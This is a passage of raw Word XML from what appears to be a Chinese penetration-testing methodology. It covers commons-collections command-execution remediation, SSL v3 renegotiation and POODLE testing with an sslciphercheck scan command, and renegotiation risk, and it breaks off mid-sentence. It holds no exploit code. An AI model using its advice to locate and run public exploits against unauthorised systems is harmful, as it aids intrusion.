        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：成功执行系统命令或脚本命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2703E6A5" w14:textId="71F49813" w:rsidR="009C1845" w:rsidRDefault="009C1845" w:rsidP="00F60514">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00463FAC" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00463FAC" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方发布了</w:t>
      </w:r>
      <w:r w:rsidR="00463FAC" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commons-collections</w:t>
      </w:r>
      <w:r w:rsidR="00463FAC" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的新版本，下载地址：</w:t>
      </w:r>
      <w:r w:rsidR="00463FAC" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00463FAC" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>http://commons.apache.org/proper/commons-collections/download_collections.cgi</w:t>
      </w:r>
      <w:r w:rsidR="00C956E4" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00463FAC" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复方法为替换有漏洞的</w:t>
      </w:r>
      <w:r w:rsidR="00463FAC" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commons-collections</w:t>
      </w:r>
      <w:r w:rsidR="00463FAC" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件</w:t>
      </w:r>
      <w:r w:rsidR="00C956E4" w:rsidRPr="00F60514">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF43D81" w14:textId="36607911" w:rsidR="00B44623" w:rsidRPr="00F60514" w:rsidRDefault="00B44623" w:rsidP="00F60514">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F51E903" w14:textId="535D5217" w:rsidR="005B5C0D" w:rsidRPr="00AD537C" w:rsidRDefault="0088721D" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc498434566"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>专项漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="44AC4B12" w14:textId="1028B459" w:rsidR="001A7E4B" w:rsidRPr="00EF0875" w:rsidRDefault="001A7E4B" w:rsidP="00EF0875">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF0875">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>专项漏洞部分注重测试方法论，每个专项仅列举一个例子。实际测试过程中，需视情况而定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346501F7" w14:textId="0DB922FD" w:rsidR="005B5C0D" w:rsidRPr="00F757E4" w:rsidRDefault="0088721D" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc498434567"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
        <w:t>/WebDAV</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="55249B36" w14:textId="6B26C8E5" w:rsidR="005B5C0D" w:rsidRPr="005C2E0F" w:rsidRDefault="005B5C0D" w:rsidP="005C2E0F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00565F53" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00235661" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00565F53" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛指</w:t>
      </w:r>
      <w:r w:rsidR="00565F53" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00FD3328" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件存在的通用漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1694ED2C" w14:textId="5A929100" w:rsidR="005B5C0D" w:rsidRPr="005C2E0F" w:rsidRDefault="005B5C0D" w:rsidP="005C2E0F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00FD3328" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据目标系统所使用的</w:t>
      </w:r>
      <w:r w:rsidR="00FD3328" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00FD3328" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件版本，查找其公开漏洞及其利用脚本。如目标使用了</w:t>
      </w:r>
      <w:r w:rsidR="00FD3328" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="00FD3328" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议，可测试是否存在</w:t>
      </w:r>
      <w:r w:rsidR="00FD3328" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL v3</w:t>
      </w:r>
      <w:r w:rsidR="00FD3328" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重协商漏洞、</w:t>
      </w:r>
      <w:r w:rsidR="00FD3328" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POODLE</w:t>
      </w:r>
      <w:r w:rsidR="00FD3328" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息泄漏漏洞等。</w:t>
      </w:r>
      <w:r w:rsidR="00582DA5" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面以</w:t>
      </w:r>
      <w:r w:rsidR="00582DA5" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL v3</w:t>
      </w:r>
      <w:r w:rsidR="00582DA5" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重协商漏洞为例进行说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8FDC49" w14:textId="77777777" w:rsidR="00582DA5" w:rsidRPr="005C2E0F" w:rsidRDefault="00582DA5" w:rsidP="005C2E0F">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描工具进行检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58040DBC" w14:textId="634D5207" w:rsidR="00582DA5" w:rsidRPr="005C2E0F" w:rsidRDefault="00582DA5" w:rsidP="005C2E0F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、通过利用</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSLciphercheck</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件，通过</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMD</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下运行，检测命令：“</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sslciphercheck.exe -h  ip</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址或者域名</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  -p  443</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00023780" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A53765B" w14:textId="4A718FF4" w:rsidR="00C706D2" w:rsidRPr="005C2E0F" w:rsidRDefault="00C24790" w:rsidP="005C2E0F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="005B5C0D" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="006B6E8E" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>＼</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TSL</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是位于一种可靠地网络层协议</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议之上的一个协议</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，该协议是为了在客户端和服务器之间生成一个安全的连接，这种连接是私密的、可靠的并且通信双方可以互相验证双方的身份</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。所以</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSI</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>＼</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TSI </w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议应该具有机密性</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、完整性和确定性。而对于重新协商，一个</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一旦建立起来，客户端</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (C )</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和服务器</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (S)</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都可以再</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一次重新协商，也称为重新握手，这将会导致在加密</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的信道上进行</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一次握手，</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C </w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过发送一个新的</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>clien</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t Hello</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息来创建一次重新协商。同样地，</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以发送一个</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Hello request</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息，从而使</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00C706D2" w:rsidRPr="005C2E0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回应一个新的</w:t>
      </w:r>
      <w:r w:rsidR="00BE26E9" w:rsidRPr="005C2E0F">
        <w:rPr>
